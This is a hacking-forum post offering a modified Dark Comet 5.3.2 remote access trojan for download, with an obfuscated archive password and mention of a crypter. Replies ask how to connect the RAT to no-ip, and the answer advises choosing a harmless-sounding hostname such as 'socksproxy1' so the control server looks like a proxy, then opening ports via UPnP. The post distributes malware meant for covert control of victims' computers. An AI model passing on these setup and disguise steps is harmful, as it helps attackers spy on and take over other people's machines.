YOUR-AD-HERE
HOSTING
TOOLS

Locked Dark Comet 5.3.2 fix by rayane888

rayane888

This is the hidden content, please

hola all level-23 today end excusiv i whant to poste the dark comet 5.3.2 ...so this version is fixed the victima disparition

the version is 5.3.1 modified ....

DOWNLOAD

------------

-----------------------------------------------

pass : =$z^7Cz^;8z^HGz^9:z^73z^76z^5:z^F6z^87z^$

titanCrypt

Thx to HUM dr.fano

RUS:

Привет, спасибо за RAT. Но у меня проблемы с его соединением с no-ip, поделитесь пожалуйста мануалом по настройке Dark Comet и no-ip.

ENG(Google translate):

Hi, thanks for the RAT. But I have a problem with its connection to the no-ip, please feel free to share a manual for setting up Dark Comet and the no-ip.

ESP(Google translate):

Hola, gracias por el RAT. Pero tengo un problema con su conexión con el no-ip, por favor siéntase libre para compartir un manual para la creación de cometa oscuro y la no-ip.

Enter a host name in the Hostname field that doesn't look suspicious. I use "socksproxy1" for example to make it look like it's just a proxy, even though it's not. Choose any domain they have, it doesn't matter; just make sure you remember it.

8-Don't change anything else, it's good as it. Your IP should be in the IP Address field.

9-Press Create Host".

end the dark comet you open the port upnp

END the next step is easy ......... :tongue:

Edited by rayane888